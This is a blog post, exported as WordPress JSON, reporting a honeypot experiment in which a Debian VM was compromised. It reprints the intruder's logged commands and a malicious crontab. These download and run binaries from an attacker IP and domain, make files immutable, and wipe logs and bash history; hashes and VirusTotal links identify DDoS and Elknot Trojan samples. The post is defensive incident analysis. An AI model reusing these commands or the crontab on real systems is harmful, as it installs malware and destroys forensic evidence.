{"id":163,"date":"2014-05-18T14:36:30","date_gmt":"2014-05-18T12:36:30","guid":{"rendered":"http:\/\/remchp.com\/blog\/?p=163"},"modified":"2017-02-16T18:00:07","modified_gmt":"2017-02-16T16:00:07","slug":"honeypot-test","status":"publish","type":"post","link":"https:\/\/futex.re\/blog\/?p=163","title":{"rendered":"Honeypot test"},"content":{"rendered":"<p>I recently heard ofa new system logger, <a href=\"http:\/\/www.sysdig.org\" title=\"sysdig\"><\/a>.<br \/>\nIt&#8217;s seem to bee very completly, it use strace, tcpdump,lsof for take trace.<\/p>\n<p>I want to try it on a honeypot.<\/p>\n<p>So, install a virtual machine with my favourite OS Debian 7.5 \ud83d\ude42<\/p>\n<p>Install sysdig is very easy, type just one command<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/futex.re\/blog\/wp-content\/uploads\/2014\/05\/sysdig_install.jpg\" alt=\"sysdig_install\" \/><\/p>\n<p>Set basic password for root like &#8220;toor&#8221;, and start loggin with this command:<br \/>\n<code><br \/>\nnohup sysdig -s 4096 -z -w \/var\/log\/.syslog\/$(hostname).scap.gz &<br \/>\n<\/code><\/p>\n<p>I use \/var\/log\/.syslog for hidden the directory \ud83d\ude42<\/p>\n<p>And wait for attack! \ud83d\ude00<\/p>\n<p>After, 4 hour, my VM was pwn.<\/p>\n<p>Netstat<br \/>\n<img decoding=\"async\" src=\"https:\/\/futex.re\/blog\/wp-content\/uploads\/2014\/05\/top_net.jpg\" alt=\"netstat\" \/><\/p>\n<p>ps<br \/>\n<img decoding=\"async\" src=\"https:\/\/futex.re\/blog\/wp-content\/uploads\/2014\/05\/ps.jpg\" alt=\"ps\" \/><\/p>\n<p>topnet<br \/>\n<img decoding=\"async\" src=\"https:\/\/futex.re\/blog\/wp-content\/uploads\/2014\/05\/top_net.jpg\" alt=\"ps\" \/><\/p>\n<p>topconnect<br \/>\n<img decoding=\"async\" src=\"https:\/\/futex.re\/blog\/wp-content\/uploads\/2014\/05\/top_connect.jpg\" alt=\"ps\" \/><\/p>\n<p>Take a look at the command use by the bad guy<br \/>\n<code><br \/>\n17:11:55 root)\/usr\/lib\/openssh\/sftp-server<br \/>\n17:12:48 root)chmod 7777 \/ etc<br \/>\n17:12:48 root)killall -9 .IptabLes<br \/>\n17:12:48 root)killall -9 nfsd4<br \/>\n17:12:48 root)killall -9 profild.key<br \/>\n17:12:48 root)cd \/etc<br \/>\n17:12:48 root)rm -rf dir fake.cfg<br \/>\n17:12:48 root)killall -9 nfsd<br \/>\n17:12:48 root)killall -9 DDosl<br \/>\n17:12:48 root)killall -9 lengchao32<br \/>\n17:12:48 root)killall -9 b26<br \/>\n17:12:48 root)killall -9 Bill<br \/>\n17:12:48 root)killall -9 n26<br \/>\n17:12:48 root)killall -9 1<br \/>\n17:12:48 root)killall -9 codelove<br \/>\n17:12:48 root)killall -9 32<br \/>\n17:12:48 root)killall -9 m32<br \/>\n17:12:48 root)killall -9 m64<br \/>\n17:12:48 root)killall -9 64<br \/>\n17:12:48 root)killall -9 83BOT<br \/>\n17:12:48 root)killall -9 node24<br \/>\n17:12:48 root)killall -9 mimi<br \/>\n17:12:48 root)killall -9 nodeJR-1<br \/>\n17:12:48 root)killall -9 freeBSD<br \/>\n17:12:48 root)killall -9 ksapdd<br \/>\n17:12:48 root)killall -9 kysapdd<br \/>\n17:12:48 root)killall -9 sksapdd<br \/>\n17:12:48 root)killall -9 xsw<br \/>\n17:12:48 root)killall -9 syslogd<br \/>\n17:12:48 root)killall -9 skysapdd<br \/>\n17:12:48 root)killall -9 cupsddd<br \/>\n17:12:48 root)killall -9 ksapd<br \/>\n17:12:48 root)killall -9 atddd<br \/>\n17:12:48 root)killall -9 xfsdxd<br \/>\n17:12:48 root)killall -9 sfewfesfs<br \/>\n17:12:48 root)cd \/root<br \/>\n17:12:48 root)chmod 7777 \/ etc<br \/>\n17:12:48 root)killall -9 minerd<br \/>\n17:12:48 root)killall -9 0<br \/>\n17:12:48 root)killall -9 joudckfr<br \/>\n17:12:48 root)killall -9 www<br \/>\n17:12:48 root)killall -9 log<br \/>\n17:12:48 root)killall -9 .IptabLex<br \/>\n17:12:48 root)killall -9 .Mm2<br \/>\n17:12:48 root)killall -9 acpid<br \/>\n17:12:48 root)killall -9 m64<br \/>\n17:12:48 root)killall -9 .\/QQ<br \/>\n17:12:48 root)killall -9 QQ<br \/>\n17:12:48 root)killall -9 g3<br \/>\n17:12:48 root)killall -9 2<br \/>\n17:12:48 root)killall -9 3<br \/>\n17:12:48 root)killall -9 pm<br \/>\n17:12:48 root)killall -9 qweasd<br \/>\n17:12:48 root)killall -9 tangtang<br \/>\n17:12:48 root)killall -9 imap-login<br \/>\n17:12:48 root)killall -9 xudp<br \/>\n17:12:48 root)killall -9 txma<br \/>\n17:12:48 root)killall -9 mrdos64.b00<br \/>\n17:12:48 root)killall -9 mrdos32.b00<br \/>\n17:12:49 root)rm -rf dir kysapdd.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir sksapdd.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir skysapdd.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir xfsdxd.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir fake.cfg<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir cupsdd.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir atdd.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir ksapd.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir kysapd.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir sksapd.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir skysapd.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir xfsdx.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir sfewfesfs<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir gfhjrtfyhuf<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir rewgtf3er4t<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir sdmfdsfhjfe<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir gfhddsfew<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir ferwfrre<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir dsfrefr<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir sfewfesfs.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir gfhjrtfyhuf.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir rewgtf3er4t.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir sdmfdsfhjfe.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir gfhddsfew.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir ferwfrre.*<br \/>\n17:12:49 root)cd \/etc<br \/>\n17:12:49 root)rm -rf dir dsfrefr.*<br \/>\n17:12:49 root)cd \/tmp<br \/>\n17:12:49 root)rm -rf dir 1.*<br \/>\n17:12:49 root)cd \/tmp<br \/>\n17:12:49 root)rm -rf dir 2.*<br \/>\n17:12:49 root)cd \/tmp<br \/>\n17:12:49 root)rm -rf dir 3.*<br \/>\n17:12:49 root)cd \/tmp<br \/>\n17:12:49 root)rm -rf dir 4.*<br \/>\n17:12:49 root)cd \/tmp<br \/>\n17:12:49 root)rm -rf dir 5.*<br \/>\n17:12:49 root)cd \/var\/spool\/cron<br \/>\n17:12:49 root)rm -rf dir root.*<br \/>\n17:12:49 root)cd \/var\/spool\/cron<br \/>\n17:12:49 root)rm -rf dir root<br \/>\n17:12:49 root)cd \/var\/spool\/cron\/crontabs<br \/>\n17:12:49 root)rm -rf dir root.*<br \/>\n17:12:49 root)cd \/var\/spool\/cron\/crontabs<br \/>\n17:12:49 root)rm -rf dir root<br \/>\n17:12:49 root)cd \/var\/spool\/cron<br \/>\n17:12:49 root)wget http:\/\/122.224.34.75:8188\/root<br \/>\n17:12:52 root)cd \/var\/spool\/cron\/crontabs<br \/>\n17:12:52 root)wget http:\/\/122.224.34.75:8188\/root<br \/>\n17:12:54 root)cd \/etc<br \/>\n17:12:54 root)wget http:\/\/122.224.34.75:8188\/sfewfesfs<br \/>\n17:13:02 root)cd \/etc<br \/>\n17:13:02 root)wget http:\/\/122.224.34.75:8188\/gfhjrtfyhuf<br \/>\n17:13:12 root)cd \/etc<br \/>\n17:13:12 root)wget http:\/\/122.224.34.75:8188\/rewgtf3er4t<br \/>\n17:13:16 root)cd \/etc<br \/>\n17:13:16 root)wget http:\/\/122.224.34.75:8188\/sdmfdsfhjfe<br \/>\n17:13:22 root)cd \/etc<br \/>\n17:13:22 root)wget http:\/\/122.224.34.75:8188\/gfhddsfew<br \/>\n17:13:30 root)cd \/etc<br \/>\n17:13:30 root)wget http:\/\/122.224.34.75:8188\/ferwfrre<br \/>\n17:13:35 root)cd \/etc<br \/>\n17:13:35 root)wget http:\/\/122.224.34.75:8188\/dsfrefr<br \/>\n17:13:41 root)cd \/etc<br \/>\n17:13:41 root)chmod 7777 sfewfesfs<br \/>\n17:13:41 root)cd \/etc<br \/>\n17:13:41 root)chmod 7777 gfhjrtfyhuf<br \/>\n17:13:41 root)cd \/etc<br \/>\n17:13:41 root)chmod 7777 rewgtf3er4t<br \/>\n17:13:41 root)cd \/etc<br \/>\n17:13:41 root)chmod 7777 sdmfdsfhjfe<br \/>\n17:13:41 root)cd \/etc<br \/>\n17:13:41 root)chmod 7777 gfhddsfew<br \/>\n17:13:41 root)cd \/etc<br \/>\n17:13:41 root)chmod 7777 ferwfrre<br \/>\n17:13:41 root)cd \/etc<br \/>\n17:13:41 root)chmod 7777 dsfrefr<br \/>\n17:13:41 root)cd \/etc<br \/>\n17:13:41 root)chattr +i sfewfesfs<br \/>\n17:13:41 root)nohup \/etc\/ferwfrre<br \/>\n17:13:41 root)nohup \/etc\/ferwfrre<br \/>\n17:13:41 root)nohup \/etc\/gfhddsfew<br \/>\n17:13:41 root)nohup \/etc\/gfhddsfew<br \/>\n17:13:41 root)nohup \/etc\/sdmfdsfhjfe<br \/>\n17:13:41 root)nohup \/etc\/sdmfdsfhjfe<br \/>\n17:13:41 root)nohup \/etc\/rewgtf3er4t<br \/>\n17:13:41 root)nohup \/etc\/rewgtf3er4t<br \/>\n17:13:41 root)nohup \/etc\/dsfrefr<br \/>\n17:13:41 root)nohup \/etc\/dsfrefr<br \/>\n17:13:41 root)rm -rf \/root\/.bash_history<br \/>\n17:13:41 root)nohup \/etc\/gfhjrtfyhuf<br \/>\n17:13:41 root)nohup \/etc\/gfhjrtfyhuf<br \/>\n17:13:41 root)touch \/root\/.bash_history<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/var\/log<br \/>\n17:13:41 root)cd \/root<br \/>\n17:13:41 root)sleep 600<br \/>\n17:13:43 root)basename \/usr\/sbin\/service<br \/>\n17:13:43 root)basename \/usr\/sbin\/service<br \/>\n17:13:43 root)cd \/<br \/>\n17:13:43 root)basename \/usr\/sbin\/service<br \/>\n17:13:43 root)basename \/usr\/sbin\/service<br \/>\n17:13:43 root)cd \/<br \/>\n17:13:43 root)run-parts --lsbsysinit --list \/lib\/lsb\/init-functions.d<br \/>\n17:13:43 root)grep -q permission<br \/>\n17:13:43 root)\/sbin\/ebtables -t filter -L<br \/>\n17:13:43 root)\/sbin\/ebtables -t filter -L<br \/>\n17:13:43 root)\/sbin\/ebtables -t nat -L<br \/>\n17:13:43 root)\/sbin\/ebtables -t broute -L<br \/>\n17:13:43 root)\/bin\/echo -n Clearing ebtables rulesets:<br \/>\n17:13:43 root)\/bin\/echo -n  filter<br \/>\n17:13:43 root)\/sbin\/ebtables -t filter --init-table<br \/>\n17:13:43 root)\/bin\/echo -n  nat<br \/>\n17:13:43 root)\/sbin\/ebtables -t nat --init-table<br \/>\n17:13:43 root)\/bin\/echo -n  broute<br \/>\n17:13:43 root)\/sbin\/ebtables -t broute --init-table<br \/>\n17:13:43 root)cut -d  -f1<br \/>\n17:13:43 root)grep -E ^(ebt|ebtable)_ \/proc\/modules<br \/>\n17:13:43 root)rmmod ebtable_broute<br \/>\n17:13:43 root)rmmod ebtable_filter<br \/>\n17:13:43 root)rmmod ebtable_nat<br \/>\n17:13:43 root)rmmod ebtables<br \/>\n17:13:43 root)\/bin\/echo -n  done<br \/>\n17:13:43 root)run-parts --lsbsysinit --list \/lib\/lsb\/init-functions.d<br \/>\n17:13:43 root)grep -q permission<br \/>\n17:13:43 root)\/sbin\/ebtables -t filter -L<br \/>\n17:13:43 root)\/sbin\/ebtables -t filter -L<br \/>\n17:13:43 root)\/sbin\/ebtables -t nat -L<br \/>\n17:13:43 root)\/sbin\/ebtables -t broute -L<br \/>\n17:13:43 root)\/bin\/echo -n Clearing ebtables rulesets:<br \/>\n17:13:43 root)\/bin\/echo -n  filter<br \/>\n17:13:43 root)\/sbin\/ebtables -t filter --init-table<br \/>\n17:13:43 root)\/bin\/echo -n  nat<br \/>\n17:13:43 root)\/sbin\/ebtables -t nat --init-table<br \/>\n17:13:43 root)\/bin\/echo -n  broute<br \/>\n17:13:43 root)\/sbin\/ebtables -t broute --init-table<br \/>\n17:13:43 root)cut -d  -f1<br \/>\n17:13:43 root)grep -E ^(ebt|ebtable)_ \/proc\/modules<br \/>\n17:13:43 root)rmmod ebtable_broute<br \/>\n17:13:43 root)rmmod ebtable_nat<br \/>\n17:13:43 root)rmmod ebtable_filter<br \/>\n17:13:43 root)rmmod ebtables<br \/>\n17:13:43 root)\/bin\/echo -n  done<br \/>\n17:13:55 root)basename \/usr\/sbin\/service<br \/>\n17:13:55 root)basename \/usr\/sbin\/service<br \/>\n17:13:55 root)cd \/<br \/>\n17:13:55 root)setsid \/etc\/.SSH2<br \/>\n17:13:55 root)setsid \/etc\/.SSH2<br \/>\n17:13:55 root)setsid \/etc\/.SSH2<br \/>\n17:13:55 root)setsid \/etc\/.SSH2<br \/>\n17:17:01 root)cd \/<br \/>\n17:17:01 root)run-parts --report \/etc\/cron.hourly<br \/>\n17:21:29 root)ps -ef<br \/>\n17:21:34 root)ps -ef<br \/>\n17:22:14 root)ps -ef<br \/>\n<\/code><\/p>\n<p>He downloaded 8 binarys.<br \/>\n17:12:49 root)wget http:\/\/122.224.34.75:8188\/root<br \/>\n17:12:54 root)wget http:\/\/122.224.34.75:8188\/sfewfesfs<br \/>\n17:13:02 root)wget http:\/\/122.224.34.75:8188\/gfhjrtfyhuf<br \/>\n17:13:12 root)wget http:\/\/122.224.34.75:8188\/rewgtf3er4t<br \/>\n17:13:16 root)wget http:\/\/122.224.34.75:8188\/sdmfdsfhjfe<br \/>\n17:13:22 root)wget http:\/\/122.224.34.75:8188\/gfhddsfew<br \/>\n17:13:30 root)wget http:\/\/122.224.34.75:8188\/ferwfrre<br \/>\n17:13:35 root)wget http:\/\/122.224.34.75:8188\/dsfrefr<\/p>\n<p>And we can find an over in \/etc\/.SSH2<\/p>\n<p>MD5: 3f5c73745f7c17702bac0642a85d7d80  sha1: 34261024f4dfa63a16055230a325e8767cfef253  dsfrefr<br \/>\nMD5: a89c089b8d020034392536d66851b939  sha1: a1bfe161d49b50d62796618c768f4d06dcfe7d5f  ferwfrre<br \/>\nMD5: 9401f208a419fb636520ea2aefc8bbd7  sha1: b66a0d68d3f8236b312a0434e504788f1a2f383c  gfhddsfew<br \/>\nMD5: e7c2f99b30daf8d99f6b5911d25fd8c7  sha1: 06957097fe51829b4c7e8009cd3dce5ba565e920  gfhjrtfyhuf<br \/>\nMD5: dc893d16316489dffa4e8d86040189b2  sha1: 931077c1b93c387e87b29e2b206aff5e5e58c223  rewgtf3er4t<br \/>\nMD5: 5d10bcb15bedb4b94092c4c2e4d245b6  sha1: 6eba031ec658aeb82aed5b94c4ba829da38553f4  sdmfdsfhjfe<br \/>\nMD5: f9ad37bc11a4f5249b660cacadd14ad3  sha1: e41a40fdcd94718eef8a954ce67bd03ac5c70a00 sfewfesfs<br \/>\nMD5: dc893d16316489dffa4e8d86040189b2  sha1: 931077c1b93c387e87b29e2b206aff5e5e58c223  SSH2<\/p>\n<p>Two binaries are packed with upx, sums when they unpacked:<\/p>\n<p>MD5: 1da702a39ad4bc15c5a1e51422f4cd69  sha1: 529f5beda846688f43c748e3b78fd947aa6bf662 rewgtf3er4t<br \/>\nMD5: f9ad37bc11a4f5249b660cacadd14ad3  sha1: e41a40fdcd94718eef8a954ce67bd03ac5c70a00 sfewfesfs<\/p>\n<p>rewgtf3er4t is the same binarie of SSH2, probably when rewgtf3er4t is launch it copy itselfe in \/etc\/.SSH2<\/p>\n<p>Virus total analysis:<\/p>\n<p><a href=\"https:\/\/www.virustotal.com\/en\/file\/682e7668b3e9314681b1b70ac3c4d2a5a890fc966c59d9d36851acee61398438\/analysis\/\" title=\"dsfrefr\">dsfrefr<\/a><br \/>\n<a href=\"https:\/\/www.virustotal.com\/en\/file\/cc66cd0ab86567dc920761b3f7711a13817a2d06fb49e5dc9123065dcaceb0fc\/analysis\/\" title=\"ferwfrre\">ferwfrre<\/a><br \/>\n<a href=\"https:\/\/www.virustotal.com\/en\/file\/054a88f45df8c2cd232c1193a13f606d39884853eef08547cc85b21d58c93bd4\/analysis\/\" title=\"gfhddsfew\">gfhddsfew<\/a><br \/>\n<a href=\"https:\/\/www.virustotal.com\/en\/file\/994c6a202d7d4d82520c5bb7c3f719a39e6ce5bf9d89add804105858bb2aff96\/analysis\/\" title=\"gfhjrtfyhuf\">gfhjrtfyhuf<\/a><br \/>\n<a href=\"https:\/\/www.virustotal.com\/en\/file\/29f89dc1da6da3fa2fa951c3453d63ff82eab3159020012a90763df279a75e25\/analysis\/\" title=\"rewgtf3er4t\">rewgtf3er4t<\/a><br \/>\n<a href=\"https:\/\/www.virustotal.com\/en\/file\/aadb2c3df170432943581c4c79665e614cc4802526c3184aca2da1aac62d72d1\/analysis\/\" title=\"sdmfdsfhjfe\">sdmfdsfhjfe<\/a><br \/>\n<a href=\"https:\/\/www.virustotal.com\/en\/file\/50e3c0c9f6827aa3b6a8922e7b5d892fe69cb542af4d5c0f745f6ea92afe3f02\/analysis\/\" title=\"sfewfesfs\">sfewfesfs<\/a><br \/>\n<a href=\"https:\/\/www.virustotal.com\/en\/file\/29f89dc1da6da3fa2fa951c3453d63ff82eab3159020012a90763df279a75e25\/analysis\/\" title=\"SSH2\">SSH2<\/a><\/p>\n<p>And root file is intended to be used as a cronfile.<br \/>\n<code><br \/>\n#more root  | grep -v ^#<br \/>\n*\/1 * * * * killall -9 .IptabLes<br \/>\n*\/1 * * * * killall -9 nfsd4<br \/>\n*\/1 * * * * killall -9 profild.key<br \/>\n*\/1 * * * * killall -9 nfsd<br \/>\n*\/1 * * * * killall -9 DDosl<br \/>\n*\/1 * * * * killall -9 lengchao32<br \/>\n*\/1 * * * * killall -9 b26<br \/>\n*\/1 * * * * killall -9 codelove<br \/>\n*\/1 * * * * killall -9 32<br \/>\n*\/1 * * * * killall -9 64<br \/>\n*\/1 * * * * killall -9 new6<br \/>\n*\/1 * * * * killall -9 new4<br \/>\n*\/1 * * * * killall -9 node24<br \/>\n*\/1 * * * * killall -9 freeBSD<br \/>\n*\/99 * * * * killall -9 sdmfdsfhjfe<br \/>\n*\/98 * * * * killall -9 gfhjrtfyhuf<br \/>\n*\/97 * * * * killall -9 sdmfdsfhjfe<br \/>\n*\/96 * * * * killall -9 rewgtf3er4t<br \/>\n*\/95 * * * * killall -9 ferwfrre<br \/>\n*\/94 * * * * killall -9 dsfrefr<br \/>\n*\/120 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/gfhjrtfyhuf<br \/>\n*\/120 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/sfewfesfs<br \/>\n*\/130 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/sdmfdsfhjfe<br \/>\n*\/130 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/gfhddsfew<br \/>\n*\/140 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/rewgtf3er4t<br \/>\n*\/140 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/ferwfrre<br \/>\n*\/120 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/dsfrefr<br \/>\n*\/120 * * * * cd \/root;rm -rf dir nohup.out<br \/>\n*\/360 * * * * cd \/etc;rm -rf dir gfhjrtfyhuf<br \/>\n*\/360 * * * * cd \/etc;rm -rf dir dsfrefr<br \/>\n*\/360 * * * * cd \/etc;rm -rf dir sdmfdsfhjfe<br \/>\n*\/360 * * * * cd \/etc;rm -rf dir rewgtf3er4t<br \/>\n*\/360 * * * * cd \/etc;rm -rf dir gfhddsfew<br \/>\n*\/360 * * * * cd \/etc;rm -rf dir ferwfrre<br \/>\n*\/1 * * * * cd \/etc;rm -rf dir sfewfesfs.*<br \/>\n*\/1 * * * * cd \/etc;rm -rf dir gfhjrtfyhuf.*<br \/>\n*\/1 * * * * cd \/etc;rm -rf dir dsfrefr.*<br \/>\n*\/1 * * * * cd \/etc;rm -rf dir sdmfdsfhjfe.*<br \/>\n*\/1 * * * * cd \/etc;rm -rf dir rewgtf3er4t.*<br \/>\n*\/1 * * * * cd \/etc;rm -rf dir gfhddsfew.*<br \/>\n*\/1 * * * * cd \/etc;rm -rf dir ferwfrre.*<br \/>\n*\/1 * * * * chmod 7777 \/etc\/gfhjrtfyhuf<br \/>\n*\/1 * * * * chmod 7777 \/etc\/sfewfesfs<br \/>\n*\/1 * * * * chmod 7777 \/etc\/dsfrefr<br \/>\n*\/1 * * * * chmod 7777 \/etc\/sdmfdsfhjfe<br \/>\n*\/1 * * * * chmod 7777 \/etc\/rewgtf3er4t<br \/>\n*\/1 * * * * chmod 7777 \/etc\/gfhddsfew<br \/>\n*\/1 * * * * chmod 7777 \/etc\/ferwfrre<br \/>\n*\/99 * * * * nohup \/etc\/sfewfesfs > \/dev\/null 2>&1&<br \/>\n*\/100 * * * * nohup \/etc\/sdmfdsfhjfe > \/dev\/null 2>&1&<br \/>\n*\/99 * * * * nohup \/etc\/gfhjrtfyhuf > \/dev\/null 2>&1&<br \/>\n*\/98 * * * * nohup \/etc\/sdmfdsfhjfe > \/dev\/null 2>&1&<br \/>\n*\/97 * * * * nohup \/etc\/rewgtf3er4t > \/dev\/null 2>&1&<br \/>\n*\/96 * * * * nohup \/etc\/ferwfrre > \/dev\/null 2>&1&<br \/>\n*\/95 * * * * nohup \/etc\/dsfrefr > \/dev\/null 2>&1&<br \/>\n*\/1 * * * * echo \"unset MAILCHECK\" >> \/etc\/profile<br \/>\n*\/1 * * * * rm -rf \/root\/.bash_history<br \/>\n*\/1 * * * * touch \/root\/.bash_history<br \/>\n*\/1 * * * * history -r<br \/>\n*\/1 * * * * cd \/var\/log > dmesg<br \/>\n*\/1 * * * * cd \/var\/log > auth.log<br \/>\n*\/1 * * * * cd \/var\/log > alternatives.log<br \/>\n*\/1 * * * * cd \/var\/log > boot.log<br \/>\n*\/1 * * * * cd \/var\/log > btmp<br \/>\n*\/1 * * * * cd \/var\/log > cron<br \/>\n*\/1 * * * * cd \/var\/log > cups<br \/>\n*\/1 * * * * cd \/var\/log > daemon.log<br \/>\n*\/1 * * * * cd \/var\/log > dpkg.log<br \/>\n*\/1 * * * * cd \/var\/log > faillog<br \/>\n*\/1 * * * * cd \/var\/log > kern.log<br \/>\n*\/1 * * * * cd \/var\/log > lastlog<br \/>\n*\/1 * * * * cd \/var\/log > maillog<br \/>\n*\/1 * * * * cd \/var\/log > user.log<br \/>\n*\/1 * * * * cd \/var\/log > Xorg.x.log<br \/>\n*\/1 * * * * cd \/var\/log > anaconda.log<br \/>\n*\/1 * * * * cd \/var\/log > yum.log<br \/>\n*\/1 * * * * cd \/var\/log > secure<br \/>\n*\/1 * * * * cd \/var\/log > wtmp<br \/>\n*\/1 * * * * cd \/var\/log > utmp<br \/>\n*\/1 * * * * cd \/var\/log > messages<br \/>\n*\/1 * * * * cd \/var\/log > spooler<br \/>\n*\/1 * * * * cd \/var\/log > sudolog<br \/>\n*\/1 * * * * cd \/var\/log > aculog<br \/>\n*\/1 * * * * cd \/var\/log > access-log<br \/>\n*\/1 * * * * cd \/root > .bash_history<br \/>\n*\/1 * * * * history -c<br \/>\n<\/code><\/p>\n<p>Al binarys as know to be ddos tools and Elknot Trojan, if later i have a little more time, i try to reverse it.<\/p>\n<p>Reference: <a href=\"http:\/\/draios.com\/fishing-for-hackers\/\" title=\"draios.com\">draios.com<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>I recently heard ofa new system logger, . It&#8217;s seem to bee very completly, it use strace, tcpdump,lsof for take trace. I want to try it on a honeypot. So, install a virtual machine with my favourite OS Debian 7.5 &hellip; <a href=\"https:\/\/futex.re\/blog\/?p=163\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/futex.re\/blog\/index.php?rest_route=\/wp\/v2\/posts\/163"}],"collection":[{"href":"https:\/\/futex.re\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/futex.re\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/futex.re\/blog\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/futex.re\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=163"}],"version-history":[{"count":17,"href":"https:\/\/futex.re\/blog\/index.php?rest_route=\/wp\/v2\/posts\/163\/revisions"}],"predecessor-version":[{"id":225,"href":"https:\/\/futex.re\/blog\/index.php?rest_route=\/wp\/v2\/posts\/163\/revisions\/225"}],"wp:attachment":[{"href":"https:\/\/futex.re\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=163"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/futex.re\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=163"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/futex.re\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=163"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}